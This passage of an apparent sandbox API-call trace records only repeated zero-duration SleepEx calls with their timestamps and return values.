returned 0x0 [0289.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.937] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.049] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.218] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.245] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.265] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.146] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.173] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.177] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.485] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.593] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.687] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.695] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.697] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.781] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.859] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.985] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.060] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.061] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.067] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.068] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.132] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.160] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.185] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0293.199] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.232] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.249] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.268] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.311] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.419] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.419] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.421] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.422] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.268] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.465] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.748] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.761] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.778] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.843] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.893] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.113] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.132] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.152] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.197] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.212] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.229] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.238] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.271] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.276] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0298.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.408] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.462] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.478] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.548] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.552] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.908] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.374] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.397] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.508] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.032] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.275] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.443] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.448] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.458] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.516] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.526] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.577] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.580] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.546] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.592] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.712] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.818] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.822] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.927] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.927] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.931] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.967] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.062] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.077] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.104] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.125] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.152] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.590] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.592] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.920] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.991] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.022] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.051] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.052] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.064] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.107] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.142] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.148] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.188] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.286] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.299] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.314] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.931] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.045] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.062] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.077] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.113] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.241] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.251] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.336] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.410] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.616] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.619] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.653] SleepEx (dwMilliseconds=0x0, 